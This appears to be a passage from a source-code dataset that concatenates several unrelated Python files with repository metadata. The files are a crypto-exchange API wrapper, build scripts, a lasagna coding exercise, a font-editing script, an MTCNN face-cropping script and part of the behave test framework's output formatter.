'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'network': None,
'address': address,
'addressTo': None,
'addressFrom': None,
'tag': tag,
'tagTo': None,
'tagFrom': None,
'type': type,
'amount': amount,
'currency': code,
'status': status,
'updated': None,
'fee': fee,
}
def parse_transaction_status_by_type(self, status, type=None):
statuses = {
'deposit': {
'1': 'pending',
'2': 'ok',
},
'withdrawal': {
'0': 'pending',
'3': 'ok',
},
}
return self.safe_string(self.safe_value(statuses, type, {}), status, status)
async def create_order(self, symbol, type, side, amount, price=None, params={}):
await self.load_markets()
market = self.market(symbol)
orderType = 2 if (type == 'limit') else 1
orderSide = 1 if (side == 'buy') else 2
request = {
'cmd': 'orderpending/trade',
'body': self.extend({
'pair': market['id'],
'account_type': 0,
'order_type': orderType,
'order_side': orderSide,
'pay_bix': 0,
'amount': amount,
'price': price,
}, params),
}
response = await self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result": "100055558128036", # order id
# "index": 12345, # random index, specific one in a batch
# "cmd":"orderpending/trade"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
id = self.safe_value(firstResult, 'result')
return {
'info': response,
'id': id,
}
async def cancel_order(self, id, symbol=None, params={}):
request = {
'cmd': 'orderpending/cancelTrade',
'body': self.extend({
'orders_id': id,
}, params),
}
response = await self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":"OK", # only indicates if the server received the cancelling request, and the cancelling result can be obtained from the order record
# "index": 12345, # random index, specific one in a batch
# "cmd":"orderpending/cancelTrade"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
return firstResult
async def fetch_order(self, id, symbol=None, params={}):
await self.load_markets()
request = {
'cmd': 'orderpending/order',
'body': self.extend({
'id': str(id),
'account_type': 0, # 0 = spot account
}, params),
}
response = await self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":{
# "id":"100055558128036",
# "createdAt": 1512756997000,
# "account_type":0,
# "coin_symbol":"LTC", # Trading Token
# "currency_symbol":"BTC", # Pricing Token
# "order_side":2, # Trading side 1-Buy, 2-Sell
# "order_type":2, # 2-limit order
# "price":"0.00900000", # order price
# "amount":"1.00000000", # order amount
# "money":"0.00900000", # currency amount(price * amount)
# "deal_amount":"0.00000000", # deal amount
# "deal_percent":"0.00%", # deal percentage
# "unexecuted":"0.00000000", # unexecuted amount
# "status":3 # Status, -1-fail, 0,1-to be dealt, 2-dealt partly, 3-dealt totally, 4- cancelled partly, 5-cancelled totally, 6-to be cancelled
# },
# "cmd":"orderpending/order"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
order = self.safe_value(firstResult, 'result')
if self.is_empty(order):
raise OrderNotFound(self.id + ' order ' + id + ' not found')
return self.parse_order(order)
def parse_order(self, order, market=None):
symbol = None
if market is None:
marketId = None
baseId = self.safe_string(order, 'coin_symbol')
quoteId = self.safe_string(order, 'currency_symbol')
if (baseId is not None) and (quoteId is not None):
marketId = baseId + '_' + quoteId
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
if market is not None:
symbol = market['symbol']
rawType = self.safe_string(order, 'order_type')
type = 'market' if (rawType == '1') else 'limit'
timestamp = self.safe_integer(order, 'createdAt')
price = self.safe_string(order, 'price')
average = self.safe_string(order, 'deal_price')
filled = self.safe_string(order, 'deal_amount')
amount = self.safe_string(order, 'amount')
cost = self.safe_string_2(order, 'deal_money', 'money')
rawSide = self.safe_string(order, 'order_side')
side = 'buy' if (rawSide == '1') else 'sell'
status = self.parse_order_status(self.safe_string(order, 'status'))
id = self.safe_string(order, 'id')
feeCost = self.safe_number(order, 'fee')
fee = None
if feeCost is not None:
fee = {
'cost': feeCost,
'currency': None,
}
return self.safe_order({
'info': order,
'id': id,
'clientOrderId': None,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': symbol,
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': None,
'amount': amount,
'cost': cost,
'average': average,
'filled': filled,
'remaining': None,
'status': status,
'fee': fee,
'trades': None,
}, market)
def parse_order_status(self, status):
statuses = {
# original comments from bibox:
'1': 'open', # pending
'2': 'open', # part completed
'3': 'closed', # completed
'4': 'canceled', # part canceled
'5': 'canceled', # canceled
'6': 'canceled', # canceling
}
return self.safe_string(statuses, status, status)
async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
await self.load_markets()
market = None
pair = None
if symbol is not None:
market = self.market(symbol)
pair = market['id']
size = limit if limit else 200
request = {
'cmd': 'orderpending/orderPendingList',
'body': self.extend({
'pair': pair,
'account_type': 0, # 0 - regular, 1 - margin
'page': 1,
'size': size,
}, params),
}
response = await self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":{
# "count":1,
# "page":1,
# "items":[
# {
# "id":"100055558128036",
# "createdAt": 1512756997000,
# "account_type":0,
# "coin_symbol":"LTC", # Trading Token
# "currency_symbol":"BTC", # Pricing Token
# "order_side":2, # Trading side 1-Buy, 2-Sell
# "order_type":2, # 2-limit order
# "price":"0.00900000", # order price
# "amount":"1.00000000", # order amount
# "money":"0.00900000", # currency amount(price * amount)
# "deal_amount":"0.00000000", # deal amount
# "deal_percent":"0.00%", # deal percentage
# "unexecuted":"0.00000000", # unexecuted amount
# "status":1 # Status,-1-fail, 0,1-to be dealt, 2-dealt partly, 3-dealt totally, 4- cancelled partly, 5-cancelled totally, 6-to be cancelled
# }
# ]
# },
# "cmd":"orderpending/orderPendingList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result', {})
orders = self.safe_value(innerResult, 'items', [])
return self.parse_orders(orders, market, since, limit)
async def fetch_closed_orders(self, symbol=None, since=None, limit=200, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchClosedOrders() requires a `symbol` argument')
await self.load_markets()
market = self.market(symbol)
request = {
'cmd': 'orderpending/pendingHistoryList',
'body': self.extend({
'pair': market['id'],
'account_type': 0, # 0 - regular, 1 - margin
'page': 1,
'size': limit,
}, params),
}
response = await self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":{
# "count":1,
# "page":1,
# "items":[
# {
# "id":"100055558128036",
# "createdAt": 1512756997000,
# "account_type":0,
# "coin_symbol":"LTC", # Trading Token
# "currency_symbol":"BTC", # Pricing Token
# "order_side":2, # Trading side 1-Buy, 2-Sell
# "order_type":2, # 2-limit order
# "price":"0.00900000", # order price
# "amount":"1.00000000", # order amount
# "money":"0.00900000", # currency amount(price * amount)
# "deal_amount":"0.00000000", # deal amount
# "deal_percent":"0.00%", # deal percentage
# "unexecuted":"0.00000000", # unexecuted amount
# "status":3 # Status,-1-fail, 0,1-to be dealt, 2-dealt partly, 3-dealt totally, 4- cancelled partly, 5-cancelled totally, 6-to be cancelled
# }
# ]
# },
# "cmd":"orderpending/pendingHistoryList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result', {})
orders = self.safe_value(innerResult, 'items', [])
return self.parse_orders(orders, market, since, limit)
async def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a `symbol` argument')
await self.load_markets()
market = self.market(symbol)
size = limit if limit else 200
request = {
'cmd': 'orderpending/orderHistoryList',
'body': self.extend({
'pair': market['id'],
'account_type': 0, # 0 - regular, 1 - margin
'page': 1,
'size': size,
'coin_symbol': market['baseId'],
'currency_symbol': market['quoteId'],
}, params),
}
response = await self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":{
# "count":1,
# "page":1,
# "items":[
# {
# "id":"100055558128033",
# "createdAt": 1512756997000,
# "account_type":0,
# "coin_symbol":"LTC",
# "currency_symbol":"BTC",
# "order_side":2,
# "order_type":2,
# "price":"0.00886500",
# "amount":"1.00000000",
# "money":"0.00886500",
# "fee":0
# }
# ]
# },
# "cmd":"orderpending/orderHistoryList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result', {})
trades = self.safe_value(innerResult, 'items', [])
return self.parse_trades(trades, market, since, limit)
async def fetch_deposit_address(self, code, params={}):
await self.load_markets()
currency = self.currency(code)
request = {
'cmd': 'transfer/transferIn',
'body': self.extend({
'coin_symbol': currency['id'],
}, params),
}
response = await self.privatePostTransfer(request)
#
# {
# "result":[
# {
# "result":"3Jx6RZ9TNMsAoy9NUzBwZf68QBppDruSKW",
# "cmd":"transfer/transferIn"
# }
# ]
# }
#
# {
# "result":[
# {
# "result":"{\"account\":\"PERSONALLY OMITTED\",\"memo\":\"PERSONALLY OMITTED\"}",
# "cmd":"transfer/transferIn"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result')
address = innerResult
tag = None
if self.is_json_encoded_object(innerResult):
parsed = json.loads(innerResult)
address = self.safe_string(parsed, 'account')
tag = self.safe_string(parsed, 'memo')
return {
'currency': code,
'address': address,
'tag': tag,
'network': None,
'info': response,
}
async def withdraw(self, code, amount, address, tag=None, params={}):
tag, params = self.handle_withdraw_tag_and_params(tag, params)
self.check_address(address)
await self.load_markets()
currency = self.currency(code)
if self.password is None:
if not ('trade_pwd' in params):
raise ExchangeError(self.id + ' withdraw() requires self.password set on the exchange instance or a trade_pwd parameter')
if not ('totp_code' in params):
raise ExchangeError(self.id + ' withdraw() requires a totp_code parameter for 2FA authentication')
request = {
'trade_pwd': self.password,
'coin_symbol': currency['id'],
'amount': amount,
'addr': address,
}
if tag is not None:
request['address_remark'] = tag
response = await self.privatePostTransfer({
'cmd': 'transfer/transferOut',
'body': self.extend(request, params),
})
#
# {
# "result":[
# {
# "result": 228, # withdrawal id
# "cmd":"transfer/transferOut"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
id = self.safe_value(firstResult, 'result')
return {
'info': response,
'id': id,
}
async def fetch_funding_fees(self, codes=None, params={}):
# by default it will try load withdrawal fees of all currencies(with separate requests)
# however if you define codes = ['ETH', 'BTC'] in args it will only load those
await self.load_markets()
withdrawFees = {}
info = {}
if codes is None:
codes = list(self.currencies.keys())
for i in range(0, len(codes)):
code = codes[i]
currency = self.currency(code)
request = {
'cmd': 'transfer/coinConfig',
'body': self.extend({
'coin_symbol': currency['id'],
}, params),
}
response = await self.privatePostTransfer(request)
# {
# "result":[
# {
# "result":[
# {
# "coin_symbol":"ETH",
# "is_active":1,
# "original_decimals":18,
# "enable_deposit":1,
# "enable_withdraw":1,
# "withdraw_fee":0.008,
# "withdraw_min":0.05,
# "deposit_avg_spent":173700,
# "withdraw_avg_spent":322600
# }
# ],
# "cmd":"transfer/coinConfig"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result', [])
firstOuterResult = self.safe_value(outerResults, 0, {})
innerResults = self.safe_value(firstOuterResult, 'result', [])
firstInnerResult = self.safe_value(innerResults, 0, {})
info[code] = firstInnerResult
withdrawFees[code] = self.safe_number(firstInnerResult, 'withdraw_fee')
return {
'info': info,
'withdraw': withdrawFees,
'deposit': {},
}
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.implode_hostname(self.urls['api']) + '/' + self.version + '/' + path
cmds = self.json([params])
if api == 'public':
if method != 'GET':
body = {'cmds': cmds}
elif params:
url += '?' + self.urlencode(params)
elif api == 'v2private':
self.check_required_credentials()
url = self.implode_hostname(self.urls['api']) + '/v2/' + path
json_params = self.json(params)
body = {
'body': json_params,
'apikey': self.apiKey,
'sign': self.hmac(self.encode(json_params), self.encode(self.secret), hashlib.md5),
}
else:
self.check_required_credentials()
body = {
'cmds': cmds,
'apikey': self.apiKey,
'sign': self.hmac(self.encode(cmds), self.encode(self.secret), hashlib.md5),
}
if body is not None:
body = self.json(body, {'convertArraysToObjects': True})
headers = {'Content-Type': 'application/json'}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return
if 'error' in response:
if 'code' in response['error']:
code = self.safe_string(response['error'], 'code')
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions, code, feedback)
raise ExchangeError(feedback)
raise ExchangeError(self.id + ' ' + body)
if not ('result' in response):
raise ExchangeError(self.id + ' ' + body)
| 42.283933
| 453
| 0.445509
|
794e1a8780f1a93d897238f81e1731cb14bfddf5
| 283
|
py
|
Python
|
setup.py
|
edolramba/QWebview-plus
|
77e160d17af9d3ad203886198cd522f9a4796445
|
[
"MIT"
] | 225
|
2016-03-11T06:03:41.000Z
|
2022-01-23T17:19:21.000Z
|
setup.py
|
edolramba/QWebview-plus
|
77e160d17af9d3ad203886198cd522f9a4796445
|
[
"MIT"
] | 20
|
2016-03-26T05:42:15.000Z
|
2021-11-13T01:01:04.000Z
|
setup.py
|
edolramba/QWebview-plus
|
77e160d17af9d3ad203886198cd522f9a4796445
|
[
"MIT"
] | 90
|
2016-03-25T04:03:18.000Z
|
2022-03-02T04:21:09.000Z
|
import sys
from cx_Freeze import setup, Executable
setup( name = "QWebview-plus",
version = "1.0",
description = "QWebview supports Kiwoom Open API+ for JavaScript",
author = "sculove",
executables = [Executable("qwebviewplus.py", base="Win32GUI")])
| 35.375
| 74
| 0.657244
|
794e1ac82b35d733cd03ec2f32db1785bb11d8e2
| 1,017
|
py
|
Python
|
problems/exercism/guidos-gorgeous-lasagna/lasagna.py
|
JayMonari/py-personal
|
ef16d030cc7fe2266d661e1378d95f588229b746
|
[
"MIT"
] | null | null | null |
problems/exercism/guidos-gorgeous-lasagna/lasagna.py
|
JayMonari/py-personal
|
ef16d030cc7fe2266d661e1378d95f588229b746
|
[
"MIT"
] | null | null | null |
problems/exercism/guidos-gorgeous-lasagna/lasagna.py
|
JayMonari/py-personal
|
ef16d030cc7fe2266d661e1378d95f588229b746
|
[
"MIT"
] | null | null | null |
EXPECTED_BAKE_TIME = 40
def bake_time_remaining(elapsed_time: int) -> int:
'''
:param elapsed_time: int baking time already elapsed
:return: int remaining bake time derived from 'EXPECTED_BAKE_TIME'
Function that takes the actual minutes the lasagna has been in the oven as
an argument and returns how many minutes the lasagna still needs to bake
based on the `EXPECTED_BAKE_TIME`.
'''
return EXPECTED_BAKE_TIME - elapsed_time
def preparation_time_in_minutes(num_layers: int) -> int:
'''
Return total preparation time needed to complete number of layers of
lasagna.
'''
return num_layers * 2
def elapsed_time_in_minutes(num_layers: int, elapsed_time: int) -> int:
'''
Return elapsed cooking time.
This function takes two numbers representing the number of layers & the
time already spent baking and calculates the total elapsed minutes spent
cooking the lasagna.
'''
return preparation_time_in_minutes(num_layers) + elapsed_time
| 30.818182
| 78
| 0.73353
|
794e1acf56a71eeb0edbc9f99239d83b79312e4e
| 1,105
|
py
|
Python
|
Masters/Color/Delete Non-Color Layers in Selected Glyphs.py
|
danielgamage/Mekkablue-Scripts
|
0b0b4468ec938f8c669b3552e2fa429080b65bf1
|
[
"Apache-2.0"
] | null | null | null |
Masters/Color/Delete Non-Color Layers in Selected Glyphs.py
|
danielgamage/Mekkablue-Scripts
|
0b0b4468ec938f8c669b3552e2fa429080b65bf1
|
[
"Apache-2.0"
] | null | null | null |
Masters/Color/Delete Non-Color Layers in Selected Glyphs.py
|
danielgamage/Mekkablue-Scripts
|
0b0b4468ec938f8c669b3552e2fa429080b65bf1
|
[
"Apache-2.0"
] | null | null | null |
#MenuTitle: Delete Non-Color Layers in Selected Glyphs
# -*- coding: utf-8 -*-
__doc__="""
Deletes all sublayers in all glyphs that are not of type "Color X" (CPAL/COLR layers).
"""
import GlyphsApp
thisFont = Glyphs.font # frontmost font
thisFontMaster = thisFont.selectedFontMaster # active master
thisFontMasterID = thisFontMaster.id
listOfSelectedLayers = thisFont.selectedLayers # active layers of selected glyphs
def process( thisGlyph ):
for i in range(len(thisGlyph.layers))[::-1]:
currentLayer = thisGlyph.layers[i]
if not currentLayer.layerId == thisFontMasterID: # not the master layer
if not currentLayer.name.startswith("Color "):
currentLayerID = currentLayer.layerId
thisGlyph.removeLayerForKey_(currentLayerID)
thisFont.disableUpdateInterface() # suppresses UI updates in Font View
for thisLayer in listOfSelectedLayers:
thisGlyph = thisLayer.parent
print "Processing", thisGlyph.name
thisGlyph.beginUndo() # begin undo grouping
process( thisGlyph )
thisGlyph.endUndo() # end undo grouping
thisFont.enableUpdateInterface() # re-enables UI updates in Font View
| 34.53125
| 86
| 0.774661
|
794e1aeafc4c2376798dbb423c8ab391c618291c
| 2,577
|
py
|
Python
|
setup.py
|
converghub/qrllib
|
d14ce543094fe6fb3ebe3d303b98b4d6129a5fdd
|
[
"MIT"
] | null | null | null |
setup.py
|
converghub/qrllib
|
d14ce543094fe6fb3ebe3d303b98b4d6129a5fdd
|
[
"MIT"
] | null | null | null |
setup.py
|
converghub/qrllib
|
d14ce543094fe6fb3ebe3d303b98b4d6129a5fdd
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import subprocess
from setuptools import setup, Extension
from setuptools.command.build_ext import build_ext
from distutils.sysconfig import get_python_inc
import distutils.sysconfig as sysconfig
class CMakeBuild(build_ext):
def run(self):
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
env = os.environ.copy()
env['CXXFLAGS'] = env.get('CXXFLAGS', '')
env['CXXFLAGS'] += ' -DVERSION_INFO=\\"' + self.distribution.get_version() + '\\"'
for ext in self.extensions:
extension_path = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
cmake_call = ['cmake', ext.sourcedir,
'-DBUILD_PYTHON=ON',
'-DBUILD_TESTS=OFF',
'-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extension_path,
'-DCMAKE_BUILD_TYPE=Release']
# Detect conda
if sys.platform == 'darwin' and 'CONDA_DEFAULT_ENV' in os.environ:
print('OSX + Conda environment detected')
python_include_dir = get_python_inc()
python_library = os.path.join(sysconfig.get_config_var('LIBDIR'), sysconfig.get_config_var('LDLIBRARY'))
cmake_call.extend(['-DPYTHON_INCLUDE_DIR=' + python_include_dir,
'-DPYTHON_LIBRARY=' + python_library])
if sys.platform == 'win32':
cmake_call.extend(['-G' + env.get('CMAKE_VS_GENERATOR', 'Ninja')])
subprocess.check_call(cmake_call, cwd=self.build_temp, env=env)
subprocess.check_call(['cmake', '--build', '.',
'--config', 'Release'], cwd=self.build_temp)
class CMakeExtension(Extension):
def __init__(self, name, sourcedir='', *args, **kw):
Extension.__init__(self, name, sources=[], *args, **kw)
self.sourcedir = os.path.abspath(sourcedir)
def setup_package():
needs_sphinx = {'build_sphinx', 'upload_docs'}.intersection(sys.argv)
sphinx = ['sphinx'] if needs_sphinx else []
cmake = []
# noinspection PyInterpreter
setup(setup_requires=['six', 'pytest-runner', 'pyscaffold>3'] + sphinx + cmake,
packages=['pyqrllib', ],
tests_require=['pytest', 'pytest-cov'],
ext_modules=[CMakeExtension('pyqrllib')],
cmdclass=dict(build_ext=CMakeBuild),
use_pyscaffold=True)
if __name__ == "__main__":
setup_package()
| 36.814286
| 120
| 0.604191
|
794e1cd6f48df42f9f86d5a0127f21465e0d0e4d
| 2,287
|
py
|
Python
|
test_detector.py
|
ResearchingDexter/mtcnn-pytorch
|
a7c5eb8ed2cd984a0990d59267cbac5a83770624
|
[
"MIT"
] | null | null | null |
test_detector.py
|
ResearchingDexter/mtcnn-pytorch
|
a7c5eb8ed2cd984a0990d59267cbac5a83770624
|
[
"MIT"
] | null | null | null |
test_detector.py
|
ResearchingDexter/mtcnn-pytorch
|
a7c5eb8ed2cd984a0990d59267cbac5a83770624
|
[
"MIT"
] | null | null | null |
from src.detector import detect_faces
from PIL import Image,ImageDraw
import os
import torch
import numpy as np
import matplotlib.pyplot as plt
import tqdm
@torch.no_grad()
def img_locate(path):
img=Image.open(path)
boundboxes,landmark=detect_faces(img.copy())
print(boundboxes,landmark)
img_draw=ImageDraw.Draw(img)
print(img.size,type(landmark))
for i,box in enumerate(boundboxes):
box=np.array(box)
lm=np.array(landmark[i],np.int32)
fill=(0,0,255)
for j in range(0,len(lm)//2):
print('j:{}'.format(j))
img_draw.point((lm[j],lm[j+5]),fill=fill)
print('box:{}'.format(box))
img_draw.rectangle(tuple(box[:4].astype(np.int32)),outline=(255,0,0), width=2)
img_draw.text(tuple(box[:2].astype(np.int32)),text="{}".format(box[-1]),fill=fill)
img.show()
plt.show()
#img_draw.rectangle(label[:4], outline=(255, 0, 0), width=0)
#img_draw.text(label[:2], text=str(label[5]), fill=(255, 0, 0), font=font)
#img.show()
@torch.no_grad()
def mtcnn_crop(in_path,out_path,crop_size=(112,96)):
if not os.path.exists(out_path):
os.makedirs(out_path)
imgs_folder=os.listdir(in_path)
for img_folder in tqdm.tqdm(imgs_folder):
if not os.path.exists(os.path.join(out_path,img_folder)):
os.makedirs(os.path.join(out_path,img_folder))
img_names=os.listdir(os.path.join(in_path,img_folder))
for name in img_names:
img=Image.open(os.path.join(in_path,img_folder,name))
boundboxes, landmark = detect_faces(img)
index=0
score=boundboxes[0][-1]
for i,box in enumerate(boundboxes):
if(box[-1]>score):
index=i
score=box[-1]
box=boundboxes[index][:4].astype(np.int32)
img_crop=img.crop(box).resize(crop_size,Image.BICUBIC)
img_crop.save(os.path.join(out_path,img_folder,name))
if __name__ == '__main__':
# path=r'G:\FaceRetrieval\lfw_funneled\Jan_Peter_Balkenende'
# name='Jan_Peter_Balkenende_0001.jpg'
# img_locate(os.path.join(path,name))
in_path=r'G:\FaceRetrieval\lfw_funneled'
out_path=r'G:\FaceRetrieval\lfw_funneled_croped'
mtcnn_crop(in_path,out_path)
| 38.116667
| 90
| 0.641014
|
794e1d7938c075776f30fdc80065d384158e74f2
| 12,921
|
py
|
Python
|
behave/formatter/pretty.py
|
wombat70/behave
|
c54493b0531795d946ac6754bfc643248cf3056a
|
[
"BSD-2-Clause"
] | 13
|
2019-10-03T19:15:14.000Z
|
2019-10-16T02:01:57.000Z
|
behave/formatter/pretty.py
|
wombat70/behave
|
c54493b0531795d946ac6754bfc643248cf3056a
|
[
"BSD-2-Clause"
] | 2
|
2019-08-28T00:05:00.000Z
|
2020-03-09T19:43:25.000Z
|
behave/formatter/pretty.py
|
fluendo/behave
|
eeffde083456dcf1a0ea9b6139b32091970118c0
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf8 -*-
from __future__ import absolute_import, division
import sys
from behave.formatter.ansi_escapes import escapes, up
from behave.formatter.base import Formatter
from behave.model_core import Status
from behave.model_describe import escape_cell, escape_triple_quotes
from behave.textutil import indent, make_indentation, text as _text
import six
from six.moves import range, zip
# -----------------------------------------------------------------------------
# TERMINAL SUPPORT:
# -----------------------------------------------------------------------------
DEFAULT_WIDTH = 80
DEFAULT_HEIGHT = 24
def get_terminal_size():
if sys.platform == "windows":
# Autodetecting the size of a Windows command window is left as an
# exercise for the reader. Prizes may be awarded for the best answer.
return (DEFAULT_WIDTH, DEFAULT_HEIGHT)
try:
import fcntl
import termios
import struct
zero_struct = struct.pack("HHHH", 0, 0, 0, 0)
result = fcntl.ioctl(0, termios.TIOCGWINSZ, zero_struct)
h, w, hp1, wp1 = struct.unpack("HHHH", result)
return w or DEFAULT_WIDTH, h or DEFAULT_HEIGHT
except Exception: # pylint: disable=broad-except
return (DEFAULT_WIDTH, DEFAULT_HEIGHT)
# -----------------------------------------------------------------------------
# COLORING SUPPORT:
# -----------------------------------------------------------------------------
class MonochromeFormat(object):
def text(self, text): # pylint: disable=no-self-use
assert isinstance(text, six.text_type)
return text
class ColorFormat(object):
def __init__(self, status):
self.status = status
def text(self, text):
assert isinstance(text, six.text_type)
return escapes[self.status] + text + escapes["reset"]
# -----------------------------------------------------------------------------
# CLASS: PrettyFormatter
# -----------------------------------------------------------------------------
class PrettyFormatter(Formatter):
# pylint: disable=too-many-instance-attributes
name = "pretty"
description = "Standard colourised pretty formatter"
def __init__(self, stream_opener, config):
super(PrettyFormatter, self).__init__(stream_opener, config)
# -- ENSURE: Output stream is open.
self.stream = self.open()
isatty = getattr(self.stream, "isatty", lambda: True)
stream_supports_colors = isatty()
self.monochrome = not config.color or not stream_supports_colors
self.show_source = config.show_source
self.show_timings = config.show_timings
self.show_multiline = config.show_multiline
self.formats = None
self.display_width = get_terminal_size()[0]
# -- UNUSED: self.tag_statement = None
self.steps = []
self._uri = None
self._match = None
self.statement = None
self.indentations = []
self.step_lines = 0
def reset(self):
# -- UNUSED: self.tag_statement = None
self.current_rule = None
self.steps = []
self._uri = None
self._match = None
self.statement = None
self.indentations = []
self.step_lines = 0
def uri(self, uri):
self.reset()
self._uri = uri
def feature(self, feature):
#self.print_comments(feature.comments, '')
self.current_rule = None
prefix = ""
self.print_tags(feature.tags, prefix)
self.stream.write(u"%s: %s" % (feature.keyword, feature.name))
if self.show_source:
# pylint: disable=redefined-builtin
format = self.format("comments")
self.stream.write(format.text(u" # %s" % feature.location))
self.stream.write("\n")
self.print_description(feature.description, " ", False)
self.stream.flush()
def rule(self, rule):
self.replay()
self.current_rule = rule
self.statement = rule
def background(self, background):
self.replay()
self.statement = background
def scenario(self, scenario):
self.replay()
self.statement = scenario
def replay(self):
self.print_statement()
self.print_steps()
self.stream.flush()
def step(self, step):
self.steps.append(step)
def match(self, match):
self._match = match
self.print_statement()
self.print_step(Status.executing, self._match.arguments,
self._match.location, self.monochrome)
self.stream.flush()
def result(self, step):
if not self.monochrome:
lines = self.step_lines + 1
if self.show_multiline:
if step.table:
lines += len(step.table.rows) + 1
if step.text:
lines += len(step.text.splitlines()) + 2
self.stream.write(up(lines))
arguments = []
location = None
if self._match:
arguments = self._match.arguments
location = self._match.location
self.print_step(step.status, arguments, location, True)
if step.error_message:
self.stream.write(indent(step.error_message.strip(), u" "))
self.stream.write("\n\n")
self.stream.flush()
def arg_format(self, key):
return self.format(key + "_arg")
def format(self, key):
if self.monochrome:
if self.formats is None:
self.formats = MonochromeFormat()
return self.formats
# -- OTHERWISE:
if self.formats is None:
self.formats = {}
# pylint: disable=redefined-builtin
format = self.formats.get(key, None)
if format is not None:
return format
format = self.formats[key] = ColorFormat(key)
return format
def eof(self):
self.replay()
self.stream.write("\n")
self.stream.flush()
def table(self, table):
prefix = u" "
if self.current_rule:
prefix += u" "
cell_lengths = []
all_rows = [table.headings] + table.rows
for row in all_rows:
lengths = [len(escape_cell(c)) for c in row]
cell_lengths.append(lengths)
max_lengths = []
for col in range(0, len(cell_lengths[0])):
max_lengths.append(max([c[col] for c in cell_lengths]))
for i, row in enumerate(all_rows):
#for comment in row.comments:
# self.stream.write(" %s\n" % comment.value)
self.stream.write(u"%s|" % prefix)
for j, (cell, max_length) in enumerate(zip(row, max_lengths)):
self.stream.write(" ")
self.stream.write(self.color(cell, None, j))
self.stream.write(" " * (max_length - cell_lengths[i][j]))
self.stream.write(" |")
self.stream.write("\n")
self.stream.flush()
def doc_string(self, doc_string):
#self.stream.write(' """' + doc_string.content_type + '\n')
doc_string = _text(doc_string)
prefix = u" "
if self.current_rule:
prefix += u" "
self.stream.write(u'%s"""\n' % prefix)
doc_string = escape_triple_quotes(indent(doc_string, prefix))
self.stream.write(doc_string)
self.stream.write(u'\n%s"""\n' % prefix)
self.stream.flush()
# def doc_string(self, doc_string):
# from behave.model_describe import ModelDescriptor
# prefix = " "
# text = ModelDescriptor.describe_docstring(doc_string, prefix)
# self.stream.write(text)
# self.stream.flush()
# -- UNUSED:
# def exception(self, exception):
# exception_text = _text(exception)
# self.stream.write(self.format("failed").text(exception_text) + "\n")
# self.stream.flush()
def color(self, cell, statuses, _color): # pylint: disable=no-self-use
if statuses:
return escapes["color"] + escapes["reset"]
# -- OTHERWISE:
return escape_cell(cell)
def indented_text(self, text, proceed):
if not text:
return u""
if proceed:
indentation = self.indentations.pop(0)
else:
indentation = self.indentations[0]
indentation = u" " * indentation
return u"%s # %s" % (indentation, text)
def calculate_location_indentations(self):
line_widths = []
for s in [self.statement] + self.steps:
string = s.keyword + " " + s.name
line_widths.append(len(string))
max_line_width = max(line_widths)
self.indentations = [max_line_width - width for width in line_widths]
def print_statement(self):
if self.statement is None:
return
prefix = u" "
if self.current_rule and self.statement.type != "rule":
prefix += prefix
self.calculate_location_indentations()
self.stream.write(u"\n")
#self.print_comments(self.statement.comments, " ")
if hasattr(self.statement, "tags"):
self.print_tags(self.statement.tags, prefix)
self.stream.write(u"%s%s: %s " % (prefix, self.statement.keyword,
self.statement.name))
location = self.indented_text(six.text_type(self.statement.location), True)
if self.show_source:
self.stream.write(self.format("comments").text(location))
self.stream.write("\n")
#self.print_description(self.statement.description, u" ")
self.statement = None
def print_steps(self):
while self.steps:
self.print_step(Status.skipped, [], None, True)
def print_step(self, status, arguments, location, proceed):
if proceed:
step = self.steps.pop(0)
else:
step = self.steps[0]
text_format = self.format(status.name)
arg_format = self.arg_format(status.name)
prefix = u" "
if self.current_rule:
prefix += u" "
#self.print_comments(step.comments, " ")
self.stream.write(prefix)
self.stream.write(text_format.text(step.keyword + " "))
line_length = 5 + len(step.keyword)
step_name = six.text_type(step.name)
text_start = 0
for arg in arguments:
if arg.end <= text_start:
# -- SKIP-OVER: Optional and nested regexp args
# - Optional regexp args (unmatched: None).
# - Nested regexp args that are already processed.
continue
# -- VALID, MATCHED ARGUMENT:
assert arg.original is not None
text = step_name[text_start:arg.start]
self.stream.write(text_format.text(text))
line_length += len(text)
